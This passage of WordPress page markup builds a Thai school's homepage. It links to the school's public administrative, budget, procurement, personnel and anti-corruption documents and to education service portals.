500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong><br>   <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงบประมาณ</a><br>       - คู่มือฝ่ายบริหารงานวิชาการ<br>       - คู่มือฝ่ายบริหารงานบุคคล<br>       - คู่มือฝ่ายบริหารงานทั่วไป</td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery 